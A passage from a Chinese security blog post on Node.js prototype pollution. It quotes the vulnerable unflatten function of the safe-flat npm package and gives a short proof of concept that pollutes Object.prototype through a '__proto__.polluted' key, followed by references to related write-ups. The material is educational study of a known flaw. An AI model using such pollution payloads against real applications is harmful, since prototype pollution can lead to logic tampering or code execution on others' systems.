<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">const</span> <span class="hljs-title function_">unflatten</span> = (<span class="hljs-params">obj, delimiter</span>) =&gt; &#123;<br>  <span class="hljs-keyword">const</span> result = &#123;&#125;<br>  <span class="hljs-keyword">const</span> seperator = delimiter &#124;&#124; defaultDelimiter<br><br>  <span class="hljs-keyword">if</span> (<span class="hljs-keyword">typeof</span> obj !== <span class="hljs-string">&#x27;object&#x27;</span> &#124;&#124; <span class="hljs-title function_">isDate</span>(obj)) <span class="hljs-keyword">return</span> obj<br><br>  <span class="hljs-keyword">const</span> <span class="hljs-title function_">unflat</span> = (<span class="hljs-params">original</span>) =&gt; &#123;<br>    <span class="hljs-title class_">Object</span>.<span class="hljs-title function_">keys</span>(original).<span class="hljs-title function_">forEach</span>(<span class="hljs-function">(<span class="hljs-params">key</span>) =&gt;</span> &#123;<br>      <span class="hljs-keyword">const</span> newKeys = key.<span class="hljs-title function_">split</span>(seperator)<br>      newKeys.<span class="hljs-title function_">reduce</span>(<span class="hljs-function">(<span class="hljs-params">o, k, i</span>) =&gt;</span> &#123;<br>        <span class="hljs-keyword">return</span> o[k] &#124;&#124; (o[k] = <span class="hljs-built_in">isNaN</span>(<span class="hljs-title class_">Number</span>(newKeys[i + <span class="hljs-number">1</span>])) ? (newKeys.<span class="hljs-property">length</span> - <span class="hljs-number">1</span> === i ? original[key] : &#123;&#125;) : [])<br>      &#125;, result)<br>    &#125;)<br>  &#125;<br><br>  <span class="hljs-title function_">unflat</span>(obj)<br>  <span class="hljs-keyword">return</span> result<br>&#125;<br></code></pre></td></tr></table></figure>

<p>通读代码可以发现实际上unflatten就是指定seperator对obj进行分割并组成新的键值对最后赋值，利用起来也很方便</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">var</span> safeFlat = <span class="hljs-built_in">require</span>(<span class="hljs-string">&quot;safe-flat&quot;</span>);<br><span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">&quot;Before : &quot;</span> + &#123;&#125;.<span class="hljs-property">polluted</span>);<br>safeFlat.<span class="hljs-title function_">unflatten</span>(&#123;<span class="hljs-string">&quot;__proto__.polluted&quot;</span>: <span class="hljs-string">&quot;Yes! Its Polluted&quot;</span>&#125;, <span class="hljs-string">&#x27;.&#x27;</span>);<br><span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">&quot;After : &quot;</span> + &#123;&#125;.<span class="hljs-property">polluted</span>);<br><span class="hljs-comment">//Before : undefined</span><br><span class="hljs-comment">//After : Yes! Its Polluted</span><br></code></pre></td></tr></table></figure>

<h2 id="ref"><a href="#ref" class="headerlink" title="ref"></a>ref</h2><p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/12053#toc-1">关于Prototype Pollution Attack的二三事 - 先知社区 (aliyun.com)</a></p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/7184">https://xz.aliyun.com/t/7184</a></p>
<p><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/248170#h2-0">从 Lodash 原型链污染到模板 RCE-安全客 - 安全资讯平台 (anquanke.com)</a></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93/">#原型链污染</a>
      
        <a href="/tags/nodejs/">#nodejs</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>nodejs原型链污染</div>
      <div>http://example.com/2022/12/30/nodejs原型链污染/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>Author</div>
          <div>springtime</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>Posted on</div>
          <div>December 30, 2022</div>
        </div>
      
      
      <div class="license-meta-item">
        <div>Licensed under</div>
        <div>
          
            
            
              <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
              <span class="hint--top hint--rounded" aria-label="BY - Attribution">
                <i class="iconfont icon-by"></i>
              </span>
              </a>
            
          
        </div>
      </div>
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2023/01/01/Linux%E7%B3%BB%E7%BB%9F%E7%BC%96%E7%A8%8B/" title="Linux系统编程">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">Linux系统编程</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/12/28/ClassLoader/" title="ClassLoader">
                        <span class="hidden-mobile">ClassLoader</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;Table of Contents</p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      headingSelector : CONFIG.toc.headingSelector || 'h1,h2,h3,h4,h5,h6',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      collapseDepth   : CONFIG.toc.collapseDepth || 0,
      scrollSmooth    : true,
      headingsOffset  : -boardTop
    });
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.10/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
</body>
</html>
